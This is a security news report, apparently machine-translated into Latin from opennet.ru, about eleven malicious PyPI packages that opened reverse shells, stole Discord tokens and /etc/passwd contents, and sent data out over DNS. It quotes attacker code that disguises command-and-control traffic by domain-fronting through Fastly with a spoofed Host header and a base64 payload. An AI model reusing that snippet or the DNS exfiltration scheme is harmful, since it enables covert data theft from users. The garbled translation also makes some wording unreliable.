In PyPI (Pythonis Package Index) indicis, 11 fasciculi in codice maligno notati sunt. Priusquam problemata cognoscerentur, fasciculi circiter 38 milium in summa receptae sunt. Fasciculi malitiosi detecti notabiles sunt ad usum methodorum sophisticatarum eorum celandi canales communicationis cum servientibus impugnantibus.
- importantpackage (6305 downloads), magna-sarcina (12897) - nexum constituit cum servo externo sub specie connectendi cum pypi.python.org ad accessum ad systema (conversa inversa) et programmata trevorc2 occultandi usus. communicatio canalis.
- pptest (10001), ipboards (946) - usus est DNS ut canalis communicationis ad informationem de systemate tradendam (in primo fasciculo nominis hospitis, directorii interni et externi IP operandi, in secundo - nomen usoris et nomen exercitus) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - Discordia servitii inditium in systemate identificatum ad exercitum externum misit.
- trrfab (287) - misit identifier, exercitus nomen et contenta /etc/passwd, /etc/hostium, /domum ad exercitum externum.
- 10Cent10 (490) - Testa adversa connexionem cum exercitu externo constituit.
- yandex-yt (4183) - nuntium ostendi de systemate decipi et ad paginam redirected cum informationibus de ulterioribus actionibus per nda.ya.ru (api.ya.cc) edita.
Praecipua notandi modus est accessus externorum exercituum adhibitorum in maximis sarcinas et fasciculis fasciculis, quibus celeriter contenta retis traditionis usus est in indice PyPI ad suam actionem occultandam. Re vera petitiones ad pypi.python.org missae sunt (inclusa nomine python.org in SNI intra petitionem HTTPS appellata), sed HTTP "Hostes" caput inclusa est nomen servientis ab oppugnatoribus regente (sec. forward.io. global.prod.fastly.net). Contentum retis traditio similem petitionem servo oppugnanti misit, parametris TLS connexionis ad pypi.python.org cum notitia transmittendi.
In infrastructura PyPI in retis traditionis velociter contenti est, qui perlucidum procuratorem Varnish utitur ad petitiones typicas cache, necnon TLS certificatorium processus in gradu CDN, potius quam ad finem servientium, ut per procuratorem petitiones HTTPS transmittat. Negotiationis scopus neglegens, petitiones mittuntur ad procuratorem, qui desideratum exercitum utens HTTP "Hostes" caput, et exercitus domain nomina ligata sunt ad CDN onus librarium IP inscriptiones quae typicae sunt pro omnibus clientibus celeriter.
Servus oppugnantium etiam cum CDN Fasty descripserunt, qui libera consilia omnibus praebet et etiam adnotationem anonymam admittit. Notabile est quod petitiones victimae mittere cum "conversa" testam creant, ratio etiam adhibetur, sed a latere exercitus oppugnantis est initiatus. Ab extra, commercium cum servo oppugnantium spectat legitimae sessionis cum directorio PyPI, encryptatum per libellum PyPI TLS. Similis ars, quae "adversa regio", antea active nominis exercitum occultare solebat cum obturarent interclusio, adhibita facultate in retiaculis quibusdam CDN ad accessum HTTPS indicando exercitum fictum in SNI et nomen transmittendi actu. Hospes postulavit in HTTP militiae caput intra sessionem TLS.
Ad actionem malignam occultandam, involucrum TrevorC2 praeterea adhibebatur ad commercium faciendi cum servo similes navigationis interretialis, exempli gratia, petitiones malignae sub specie imaginis "https://pypi.python.org/images/ missae". guid = "cum notitia modum translitterandi in guid parametri. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Fasciculi pptest et ipboards alia accessu ad retiaculum celandum usi sunt, innixa in modum informationis utilissimarum in inquisitionibus ad DNS server. Malware informationes transmittit per DNS petitiones faciendo sicut "nu4timjagq4fimbuhe.example.com", in quo notitia ad ditionem servientis transmissa transmittit utens forma basi64 in nomine subdomain. Oppugnator has epistulas accipit moderando DNS server pro exemplo.com dominio.
Source: opennet.ru